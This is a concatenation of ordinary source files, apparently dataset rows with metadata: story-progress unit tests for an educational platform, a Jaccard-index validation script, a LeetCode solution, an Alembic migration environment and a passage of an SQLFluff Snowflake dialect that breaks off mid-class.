test_cannot_update_new_prerequisite_skill_ids_with_invalid_node_id( self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_PREREQUISITE_SKILL_IDS), 'node_id': 'invalid_node', 'old_value': [], 'new_value': [] })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Updated story new_prerequisite_skill_ids.') def test_cannot_mark_node_outline_as_unfinalized_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS, 'node_id': 'invalid_node', 'old_value': '', 'new_value': '' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Mark node outline as unfinalized.') def test_cannot_mark_node_outline_as_finalized_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS, 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'new_value' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Mark node outline as finalized.') def test_cannot_update_node_title_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': story_domain.STORY_NODE_PROPERTY_TITLE, 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'new_title' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Update node title.') def test_cannot_update_node_description_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': story_domain.STORY_NODE_PROPERTY_DESCRIPTION, 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'new_description' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Update node description.') def test_cannot_update_node_thumbnail_filename_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_THUMBNAIL_FILENAME), 'node_id': 'invalid_node', 'old_value': '', 'new_value': 'new_image.svg' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Update node thumbnail filename.') def test_cannot_update_node_thumbnail_bg_color_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_THUMBNAIL_BG_COLOR), 'node_id': 'invalid_node', 'old_value': '', 'new_value': '#F8BF74' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Update node thumbnail bg color.') def test_cannot_delete_node_with_invalid_node_id(self): change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': 'invalid_node' })] with self.assertRaisesRegexp( Exception, 'The node with id invalid_node is not part of this story'): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Delete node.') def test_cannot_delete_starting_node_of_story(self): changelist = [ story_domain.StoryChange({ 'cmd': story_domain.CMD_ADD_STORY_NODE, 'node_id': self.NODE_ID_2, 'title': 'Title 2' }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_PROPERTY, 'property_name': ( story_domain.STORY_NODE_PROPERTY_DESTINATION_NODE_IDS), 'node_id': self.NODE_ID_2, 'old_value': [], 'new_value': [self.NODE_ID_1] }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_NODE_OUTLINE_STATUS, 'node_id': self.NODE_ID_2, 'old_value': False, 'new_value': True }), story_domain.StoryChange({ 'cmd': story_domain.CMD_UPDATE_STORY_CONTENTS_PROPERTY, 'property_name': ( story_domain.INITIAL_NODE_ID), 'old_value': self.NODE_ID_1, 'new_value': self.NODE_ID_2 }) ] story_services.update_story( self.USER_ID, self.STORY_ID, changelist, 'Added node.') change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': self.NODE_ID_2 })] with self.assertRaisesRegexp( Exception, 'The node with id %s is the starting node for the story, ' 'change the starting node before deleting it.' % self.NODE_ID_2): story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Delete node.') def test_delete_initial_node(self): story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertEqual( story.story_contents.initial_node_id, self.NODE_ID_1) change_list = [story_domain.StoryChange({ 'cmd': story_domain.CMD_DELETE_STORY_NODE, 'node_id': self.NODE_ID_1 })] story_services.update_story( self.USER_ID, self.STORY_ID, change_list, 'Delete node.') story = story_fetchers.get_story_by_id(self.STORY_ID) self.assertIsNone(story.story_contents.initial_node_id) class StoryProgressUnitTests(test_utils.GenericTestBase): """Tests functions which deal with any progress a user has made within a story, including query and recording methods related to nodes which are completed in the context of the story. """ def _get_progress_model(self, user_id, STORY_ID): """Returns the StoryProgressModel corresponding to the story id and user id. """ return user_models.StoryProgressModel.get( user_id, STORY_ID, strict=False) def _record_completion(self, user_id, STORY_ID, node_id): """Records the completion of a node in the context of a story.""" story_services.record_completed_node_in_story_context( user_id, STORY_ID, node_id) def setUp(self): super(StoryProgressUnitTests, self).setUp() self.STORY_1_ID = 'story_id' self.STORY_ID_1 = 'story_id_1' self.NODE_ID_1 = 'node_1' self.NODE_ID_2 = 'node_2' self.NODE_ID_3 = 'node_3' self.NODE_ID_4 = 'node_4' self.USER_ID = 'user' self.owner_id = 'owner' self.TOPIC_ID = topic_fetchers.get_new_topic_id() self.save_new_topic( self.TOPIC_ID, self.USER_ID, name='New Topic', abbreviated_name='topic-two', url_fragment='topic-two', description='A new topic', canonical_story_ids=[], additional_story_ids=[], uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0) story = story_domain.Story.create_default_story( self.STORY_1_ID, 'Title', 'Description', self.TOPIC_ID, 'title') self.node_1 = { 'id': self.NODE_ID_1, 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 1', 'description': 'Description 1', 'destination_node_ids': ['node_2'], 'acquired_skill_ids': [], 'prerequisite_skill_ids': [], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } self.node_2 = { 'id': self.NODE_ID_2, 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 2', 'description': 'Description 2', 'destination_node_ids': ['node_3'], 'acquired_skill_ids': [], 'prerequisite_skill_ids': [], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } self.node_3 = { 'id': self.NODE_ID_3, 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 3', 'description': 'Description 3', 'destination_node_ids': ['node_4'], 'acquired_skill_ids': [], 'prerequisite_skill_ids': [], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } self.node_4 = { 'id': self.NODE_ID_4, 'thumbnail_filename': 'image.svg', 'thumbnail_bg_color': constants.ALLOWED_THUMBNAIL_BG_COLORS[ 'chapter'][0], 'thumbnail_size_in_bytes': 21131, 'title': 'Title 4', 'description': 'Description 4', 'destination_node_ids': [], 'acquired_skill_ids': [], 'prerequisite_skill_ids': [], 'outline': '', 'outline_is_finalized': False, 'exploration_id': None } story.story_contents.nodes = [ story_domain.StoryNode.from_dict(self.node_1), story_domain.StoryNode.from_dict(self.node_2), story_domain.StoryNode.from_dict(self.node_3), story_domain.StoryNode.from_dict(self.node_4) ] self.nodes = story.story_contents.nodes story.story_contents.initial_node_id = 'node_1' story.story_contents.next_node_id = 'node_5' story_services.save_new_story(self.USER_ID, story) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, story.id) def test_get_completed_node_ids(self): # There should be no exception if the user or story do not exist; # it should also return an empty list in both of these situations. self.assertEqual(story_fetchers.get_completed_node_ids( 'Fake', self.STORY_1_ID), []) self.assertEqual(story_fetchers.get_completed_node_ids( self.owner_id, 'Fake'), []) # If no model exists, there should be no completed node IDs. self.assertIsNone( self._get_progress_model(self.owner_id, self.STORY_1_ID)) self.assertEqual(story_fetchers.get_completed_node_ids( self.owner_id, self.STORY_1_ID), []) # If the first node is completed, it should be reported. self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) self.assertEqual(story_fetchers.get_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_1]) # If all nodes are completed, all of them should be reported. self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3) self.assertEqual( story_fetchers.get_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3]) def test_get_latest_completed_node_ids(self): self.assertIsNone( self._get_progress_model(self.owner_id, self.STORY_1_ID)) self.assertEqual(story_fetchers.get_latest_completed_node_ids( self.owner_id, self.STORY_1_ID), []) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) self.assertEqual( story_fetchers.get_latest_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_1]) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4) self.assertEqual( story_fetchers.get_latest_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4]) def test_get_latest_completed_node_ids_different_completion_order(self): self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) self.assertEqual( story_fetchers.get_latest_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4]) def test_get_latest_completed_node_ids_multiple_completions(self): self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_3) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_4) self.assertEqual( story_fetchers.get_latest_completed_node_ids( self.owner_id, self.STORY_1_ID), [self.NODE_ID_2, self.NODE_ID_3, self.NODE_ID_4]) def test_get_completed_nodes_in_story(self): self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_2) for ind, completed_node in enumerate( story_fetchers.get_completed_nodes_in_story( self.owner_id, self.STORY_1_ID)): self.assertEqual( completed_node.to_dict(), self.nodes[ind].to_dict()) def test_get_pending_and_all_nodes_in_story(self): self._record_completion(self.owner_id, self.STORY_1_ID, self.NODE_ID_1) # The starting index is 1 because the first story node is completed, # and the pending nodes will start from the second node. for index, pending_node in enumerate( story_fetchers.get_pending_and_all_nodes_in_story( self.owner_id, self.STORY_1_ID)['pending_nodes'], start=1): self.assertEqual( pending_node.to_dict(), self.nodes[index].to_dict()) def test_record_completed_node_in_story_context(self): # Ensure that node completed within the context of a story are # recorded correctly. This test actually validates both # test_get_completed_node_ids and # test_get_next_node_id_to_be_completed_by_user. # By default, no completion model should exist for a given user and # story. completion_model = self._get_progress_model( self.owner_id, self.STORY_1_ID) self.assertIsNone(completion_model) # If the user 'completes an node', the model should record it. story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_1_ID, self.NODE_ID_1) completion_model = self._get_progress_model( self.owner_id, self.STORY_1_ID) self.assertIsNotNone(completion_model) self.assertEqual( completion_model.completed_node_ids, [ self.NODE_ID_1]) # If the same node is completed again within the context of this # story, it should not be duplicated. story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_1_ID, self.NODE_ID_1) completion_model = self._get_progress_model( self.owner_id, self.STORY_1_ID) self.assertEqual( completion_model.completed_node_ids, [ self.NODE_ID_1]) # If the same node and another are completed within the context # of a different story, it shouldn't affect this one. self.save_new_story(self.STORY_ID_1, self.USER_ID, self.TOPIC_ID) topic_services.add_canonical_story( self.USER_ID, self.TOPIC_ID, self.STORY_ID_1) story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_ID_1, self.NODE_ID_1) story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_ID_1, self.NODE_ID_2) completion_model = self._get_progress_model( self.owner_id, self.STORY_1_ID) self.assertEqual( completion_model.completed_node_ids, [ self.NODE_ID_1]) # If two more nodes are completed, they are recorded. story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_1_ID, self.NODE_ID_2) story_services.record_completed_node_in_story_context( self.owner_id, self.STORY_1_ID, self.NODE_ID_3) completion_model = self._get_progress_model( self.owner_id, self.STORY_1_ID) self.assertEqual( completion_model.completed_node_ids, [ self.NODE_ID_1, self.NODE_ID_2, self.NODE_ID_3]) class StoryContentsMigrationTests(test_utils.GenericTestBase): def test_migrate_story_contents_to_latest_schema(self): story_id = story_services.get_new_story_id() topic_id = topic_fetchers.get_new_topic_id() user_id = 'user_id' self.save_new_topic( topic_id, user_id, name='Topic', abbreviated_name='topic-three', url_fragment='topic-three', description='A new topic', canonical_story_ids=[], additional_story_ids=[], uncategorized_skill_ids=[], subtopics=[], next_subtopic_id=0) story_model = story_models.StoryModel( id=story_id, description='Description', title='Title', language_code='1', story_contents_schema_version=1, notes='Notes', corresponding_topic_id=topic_id, story_contents=self.VERSION_1_STORY_CONTENTS_DICT ) current_schema_version_swap = self.swap( feconf, 'CURRENT_STORY_CONTENTS_SCHEMA_VERSION', 5) with current_schema_version_swap: story = story_fetchers.get_story_from_model(story_model) self.assertEqual(story.story_contents_schema_version, 5) self.assertEqual( story.story_contents.to_dict(), self.VERSION_5_STORY_CONTENTS_DICT)
42.633006
80
0.614747
d7f1ce9654a4daebe7ad3dc3f19e224f0716bfa4
4,525
py
Python
src/validation_jaccard_index.py
uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public
177eca4992cfdfac49c135f5597904182748b873
[ "MIT" ]
2
2020-03-05T23:30:05.000Z
2021-01-10T20:48:47.000Z
src/validation_jaccard_index.py
uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public
177eca4992cfdfac49c135f5597904182748b873
[ "MIT" ]
null
null
null
src/validation_jaccard_index.py
uwasystemhealth/Maintenance_Work_Order_Processing_Pipeline_Public
177eca4992cfdfac49c135f5597904182748b873
[ "MIT" ]
1
2020-04-05T15:00:26.000Z
2020-04-05T15:00:26.000Z
import pandas as pd import global_variables as v def validation(manually_tagged_rows, automatically_tagged_rows, delimiter): correct = 0 incorrect = 0 ignored = 0 final_jaccard_index = 0 jaccard_count = 0 recordCount = 0 zeroTaggedCount = 0; for index, row in manually_tagged_rows.iterrows(): # for each manually tagged record #print(row) true_tokens = row['tagged_record'].split(' ') row_number = row['row_number'] final_tokens = [] generated_tokens = [] for true_token in true_tokens: if delimiter in true_token: # if something is tagged as symptom/state true_token = true_token.replace('-', ' ') # remove punctuation from results true_token = true_token.replace(delimiter, ' ') # remove delimiter from results final_tokens.append(true_token.strip()) test_tokens = automatically_tagged_rows.iloc[row_number - 1] # get the corresponding auto tagged record test_tokens = test_tokens['tagged_sentence'].split(' ') for test_token in test_tokens: if delimiter in test_token: test_token = test_token.replace('-', ' ') # remove punctuation from results test_token = test_token.replace(delimiter, ' ') # remove delimiter from results generated_tokens.append(test_token.strip()) if len(final_tokens) == 0 : ignored += 1 elif final_tokens == generated_tokens: correct += 1 else: incorrect += 1 #print('true' + str(final_tokens)) #print('attempt' + str(generated_tokens)) #print (true_tokens) if len(final_tokens) == 0 or len(generated_tokens) == 0: #skip c = 1 else: common_phrases = list(set(final_tokens).intersection(generated_tokens)) #print("common: " + str(common_phrases)) all_phrases = list(set(final_tokens+generated_tokens)) #print("all: " + str(all_phrases)) jaccard_count = jaccard_count + len(common_phrases) / len(all_phrases) recordCount = recordCount + 1 #if (len(all_phrases) == 0 and len(common_phrases) == 0): # jaccard_count = jaccard_count + 1 # zeroTaggedCount = zeroTaggedCount + 1; #else: # jaccard_count = jaccard_count + len(common_phrases)/len(all_phrases) #recordCount = recordCount + 1 print('correct:') print(correct) print('incorrect:') print(incorrect) print('% correct:') print((correct/(incorrect+correct))*100) final_jaccard_index = jaccard_count/recordCount print('jaccard_index:') print(final_jaccard_index) print(zeroTaggedCount) manually_tagged_data = pd.read_excel(v.validation_path, sheet_name=v.input_file_sheet_name) def main(): print("Starting Pipeline Validation") print("Validating Symptom/State Tagged Records") # 82% # JI:0.823 data = pd.read_excel(v.symptom_state_output_path, sheet_name=v.input_file_sheet_name) validation(manually_tagged_data, data, v.symptom_state_tag_symbol) print("Validating Maintenance Activity Tagged Records") # 86% # JI:0.897 data = pd.read_excel(v.maintenance_activity_output_path, sheet_name=v.input_file_sheet_name) validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol) print("Validating Maintenance Item Tagged Records") # 34% # JI:0.359 data = pd.read_excel(v.maintenance_item_output_path, sheet_name=v.input_file_sheet_name) validation(manually_tagged_data, data, v.maintenance_item_tag_symbol) ### Baseline validation print("Validating Symptom/State Tagged Records") # 82% print(v.baseline_output_path) data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name) print('here') validation(manually_tagged_data, data, v.symptom_state_tag_symbol) print("Validating Maintenance Activity Tagged Records") # 69% data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name) validation(manually_tagged_data, data, v.maintenance_activity_tag_symbol) print("Validating Maintenance Item Tagged Records") # 24% data = pd.read_excel(v.baseline_output_path, sheet_name=v.input_file_sheet_name) validation(manually_tagged_data, data, v.maintenance_item_tag_symbol) print("Validation Finished") if __name__ == "__main__": main()
38.675214
111
0.675138
1379d320044ca616b0c7409e8afe5c8f388e060e
532
py
Python
leetcode/946. Validate Stack Sequences/soln.py
saisankargochhayat/algo_quest
a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc
[ "Apache-2.0" ]
3
2017-02-15T20:55:04.000Z
2018-09-26T18:48:24.000Z
leetcode/946. Validate Stack Sequences/soln.py
saisankargochhayat/algo_quest
a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc
[ "Apache-2.0" ]
4
2017-10-07T18:59:20.000Z
2019-10-08T05:43:25.000Z
leetcode/946. Validate Stack Sequences/soln.py
saisankargochhayat/algo_quest
a24f9a22c019ab31d56bd5a7ca5ba790d54ce5dc
[ "Apache-2.0" ]
1
2017-10-08T06:52:21.000Z
2017-10-08T06:52:21.000Z
class Solution: def validateStackSequences(self, pushed: List[int], popped: List[int]) -> bool: st = [] i, j = 0, 0 while i < len(pushed) and j < len(popped): # Lets start by pushing an element st.append(pushed[i]) # Now try popping as much as possible while st and j < len(popped) and (st[-1] == popped[j]): st.pop() j += 1 i += 1 return True if j == len(popped) else False
31.294118
83
0.469925
4a7a44fbd6619870d43d004ff6c5a1401c2fba3c
2,155
py
Python
alembic/env.py
sheeley/Safe-Streets-Event-Tracker
0b312f7476e4f5b25bf66cfd4038301a5615fcdb
[ "MIT" ]
1
2016-02-11T06:13:25.000Z
2016-02-11T06:13:25.000Z
alembic/env.py
sheeley/Safe-Streets-Event-Tracker
0b312f7476e4f5b25bf66cfd4038301a5615fcdb
[ "MIT" ]
8
2015-04-09T03:38:18.000Z
2015-05-28T16:33:54.000Z
alembic/env.py
sheeley/Safe-Streets-Event-Tracker
0b312f7476e4f5b25bf66cfd4038301a5615fcdb
[ "MIT" ]
null
null
null
from __future__ import with_statement from alembic import context from sqlalchemy import create_engine, pool from logging.config import fileConfig from os import environ # this is the Alembic Config object, which provides # access to the values within the .ini file in use. config = context.config # Interpret the config file for Python logging. # This line sets up loggers basically. fileConfig(config.config_file_name) # add your model's MetaData object here # for 'autogenerate' support # from myapp import mymodel # target_metadata = mymodel.Base.metadata target_metadata = None # other values from the config, defined by the needs of env.py, # can be acquired: # my_important_option = config.get_main_option("my_important_option") # ... etc. env_db = environ.get('DATABASE_URL') SQLALCHEMY_DATABASE_URI = env_db if env_db else config.get_main_option("sqlalchemy.url") def run_migrations_offline(): """Run migrations in 'offline' mode. This configures the context with just a URL and not an Engine, though an Engine is acceptable here as well. By skipping the Engine creation we don't even need a DBAPI to be available. Calls to context.execute() here emit the given string to the script output. """ context.configure( url=SQLALCHEMY_DATABASE_URI, target_metadata=target_metadata, literal_binds=True) with context.begin_transaction(): context.run_migrations() def run_migrations_online(): """Run migrations in 'online' mode. In this scenario we need to create an Engine and associate a connection with the context. """ connectable = create_engine(SQLALCHEMY_DATABASE_URI) # engine_from_config( # config.get_section(config.config_ini_section), # prefix='sqlalchemy.', # poolclass=pool.NullPool) with connectable.connect() as connection: context.configure( connection=connection, target_metadata=target_metadata ) with context.begin_transaction(): context.run_migrations() if context.is_offline_mode(): run_migrations_offline() else: run_migrations_online()
28.733333
89
0.732715
8eaa00e9b8d1193c79f4c40c8d8497d7c49955c3
18,925
py
Python
src/sqlfluff/dialects/dialect_snowflake.py
swanderz/sqlfluff
668f23500ce5d06f4de67333a8957811c2df485f
[ "MIT" ]
null
null
null
src/sqlfluff/dialects/dialect_snowflake.py
swanderz/sqlfluff
668f23500ce5d06f4de67333a8957811c2df485f
[ "MIT" ]
null
null
null
src/sqlfluff/dialects/dialect_snowflake.py
swanderz/sqlfluff
668f23500ce5d06f4de67333a8957811c2df485f
[ "MIT" ]
null
null
null
"""The Snowflake dialect. Inherits from Postgres. Based on https://docs.snowflake.com/en/sql-reference-commands.html """ from sqlfluff.core.dialects import load_raw_dialect from sqlfluff.core.parser import ( BaseSegment, NamedSegment, OneOf, Ref, Sequence, AnyNumberOf, ReSegment, SymbolSegment, Bracketed, Anything, Delimited, StartsWith, Indent, Dedent, ) ansi_dialect = load_raw_dialect("ansi") postgres_dialect = load_raw_dialect("postgres") snowflake_dialect = postgres_dialect.copy_as("snowflake") snowflake_dialect.patch_lexer_struct( [ # In snowflake, a double single quote resolves as a single quote in the string. # https://docs.snowflake.com/en/sql-reference/data-types-text.html#single-quoted-string-constants ("single_quote", "regex", r"'([^']|'')*'", dict(is_code=True)), ] ) snowflake_dialect.insert_lexer_struct( # Keyword assigner needed for keyword functions. [("parameter_assigner", "regex", r"=>", dict(is_code=True))], before="not_equal", ) snowflake_dialect.insert_lexer_struct( # Column selector # https://docs.snowflake.com/en/sql-reference/sql/select.html#parameters [("column_selector", "regex", r"\$[0-9]+", dict(is_code=True))], before="not_equal", ) snowflake_dialect.sets("unreserved_keywords").update( [ "API", "AUTHORIZATIONS", "BERNOULLI", "BLOCK", "DELEGATED", "HISTORY", "LATERAL", "NETWORK", "PIPE", "PIPES", "QUERIES", "REGIONS", "REMOVE", "SECURE", "SEED", "TERSE", "UNSET", ] ) snowflake_dialect.sets("reserved_keywords").update( [ "CLONE", "MASKING", "NOTIFICATION", "PIVOT", "SAMPLE", "TABLESAMPLE", "UNPIVOT", ] ) snowflake_dialect.add( # In snowflake, these are case sensitive even though they're not quoted # so they need a different `name` and `type` so they're not picked up # by other rules. ParameterAssignerSegment=SymbolSegment.make( "=>", name="parameter_assigner", type="parameter_assigner" ), NakedSemiStructuredElementSegment=ReSegment.make( r"[A-Z0-9_]*", name="naked_semi_structured_element", type="semi_structured_element", ), QuotedSemiStructuredElementSegment=NamedSegment.make( "double_quote", name="quoted_semi_structured_element", type="semi_structured_element", ), ColumnIndexIdentifierSegment=ReSegment.make( r"\$[0-9]+", name="column_index_identifier_segment", type="identifier" ), ) snowflake_dialect.replace( Accessor_Grammar=AnyNumberOf( Ref("ArrayAccessorSegment"), # Add in semi structured expressions Ref("SemiStructuredAccessorSegment"), ), PreTableFunctionKeywordsGrammar=OneOf(Ref("LateralKeywordSegment")), FunctionContentsExpressionGrammar=OneOf( Ref("DatetimeUnitSegment"), Ref("NamedParameterExpressionSegment"), Sequence( Ref("ExpressionSegment"), Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True), ), ), JoinLikeClauseGrammar=Sequence( AnyNumberOf( Ref("FromAtExpressionSegment"), Ref("FromBeforeExpressionSegment"), Ref("FromPivotExpressionSegment"), Ref("FromUnpivotExpressionSegment"), Ref("SamplingExpressionSegment"), min_times=1, ), Ref("TableAliasExpressionSegment", optional=True), ), SingleIdentifierGrammar=OneOf( Ref("NakedIdentifierSegment"), Ref("QuotedIdentifierSegment"), Ref("ColumnIndexIdentifierSegment"), ), PostFunctionGrammar=Sequence( Ref("WithinGroupClauseSegment", optional=True), Sequence(OneOf("IGNORE", "RESPECT"), "NULLS", optional=True), Ref("OverClauseSegment", optional=True), ), ) @snowflake_dialect.segment(replace=True) class StatementSegment(ansi_dialect.get_segment("StatementSegment")): # type: ignore """A generic segment, to any of its child subsegments.""" parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy( insert=[ Ref("UseStatementSegment"), Ref("CreateStatementSegment"), Ref("CreateCloneStatementSegment"), Ref("ShowStatementSegment"), Ref("AlterUserSegment"), ], remove=[ Ref("CreateTypeStatementSegment"), Ref("CreateExtensionStatementSegment"), Ref("CreateIndexStatementSegment"), Ref("DropIndexStatementSegment"), Ref("CreateFunctionStatementSegment"), ], ) @snowflake_dialect.segment() class CreateStatementCommentSegment(BaseSegment): """A comment in a create statement. e.g. comment = 'a new view' """ type = "snowflake_comment" match_grammar = Sequence( Ref.keyword("COMMENT"), Ref("EqualsSegment"), Ref("LiteralGrammar"), ) @snowflake_dialect.segment() class TableAliasExpressionSegment(BaseSegment): """A reference to an object with an `AS` clause, optionally with column aliasing.""" type = "table_alias_expression" match_grammar = Sequence( Ref("AliasExpressionSegment"), # Optional column aliases too. Bracketed( Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment")), optional=True, ), ) @snowflake_dialect.segment() class FromAtExpressionSegment(BaseSegment): """An AT expression.""" type = "from_at_expression" match_grammar = Sequence("AT", Bracketed(Anything())) parse_grammar = Sequence( "AT", Bracketed( OneOf("TIMESTAMP", "OFFSET", "STATEMENT"), Ref("ParameterAssignerSegment"), Ref("ExpressionSegment"), ), ) @snowflake_dialect.segment() class FromBeforeExpressionSegment(BaseSegment): """A BEFORE expression.""" type = "from_before_expression" match_grammar = Sequence("BEFORE", Bracketed(Anything())) parse_grammar = Sequence( "BEFORE", Bracketed( OneOf("TIMESTAMP", "OFFSET", "STATEMENT"), Ref("ParameterAssignerSegment"), Ref("ExpressionSegment"), ), ) @snowflake_dialect.segment() class FromPivotExpressionSegment(BaseSegment): """A PIVOT expression.""" type = "from_pivot_expression" match_grammar = Sequence("PIVOT", Bracketed(Anything())) parse_grammar = Sequence( "PIVOT", Bracketed( Ref("FunctionSegment"), "FOR", Ref("SingleIdentifierGrammar"), "IN", Bracketed(Delimited(Ref("LiteralGrammar"), delimiter=Ref("CommaSegment"))), ), ) @snowflake_dialect.segment() class FromUnpivotExpressionSegment(BaseSegment): """An UNPIVOT expression.""" type = "from_unpivot_expression" match_grammar = Sequence("UNPIVOT", Bracketed(Anything())) parse_grammar = Sequence( "UNPIVOT", Bracketed( Ref("SingleIdentifierGrammar"), "FOR", Ref("SingleIdentifierGrammar"), "IN", Bracketed( Delimited(Ref("SingleIdentifierGrammar"), delimiter=Ref("CommaSegment")) ), ), ) @snowflake_dialect.segment() class SamplingExpressionSegment(BaseSegment): """A sampling expression.""" type = "snowflake_sample_expression" match_grammar = Sequence( OneOf("SAMPLE", "TABLESAMPLE"), OneOf("BERNOULLI", "ROW", "SYSTEM", "BLOCK", optional=True), Bracketed(Ref("NumericLiteralSegment"), Ref.keyword("ROWS", optional=True)), Sequence( OneOf("REPEATABLE", "SEED"), Bracketed(Ref("NumericLiteralSegment")), optional=True, ), ) @snowflake_dialect.segment() class NamedParameterExpressionSegment(BaseSegment): """A keyword expression. e.g. 'input => custom_fields' """ type = "snowflake_keyword_expression" match_grammar = Sequence( Ref("ParameterNameSegment"), Ref("ParameterAssignerSegment"), OneOf( Ref("LiteralGrammar"), Ref("ColumnReferenceSegment"), Ref("ExpressionSegment"), ), ) @snowflake_dialect.segment() class SemiStructuredAccessorSegment(BaseSegment): """A semi-structured data accessor segment. https://docs.snowflake.com/en/user-guide/semistructured-considerations.html """ type = "snowflake_semi_structured_expression" match_grammar = Sequence( Ref("ColonSegment"), OneOf( Ref("NakedSemiStructuredElementSegment"), Ref("QuotedSemiStructuredElementSegment"), ), Ref("ArrayAccessorSegment", optional=True), AnyNumberOf( Sequence( OneOf( # Can be delimited by dots or colons Ref("DotSegment"), Ref("ColonSegment"), ), OneOf( Ref("NakedSemiStructuredElementSegment"), Ref("QuotedSemiStructuredElementSegment"), ), Ref("ArrayAccessorSegment", optional=True), allow_gaps=True, ), allow_gaps=True, ), allow_gaps=True, ) @snowflake_dialect.segment(replace=True) class SelectClauseModifierSegment( 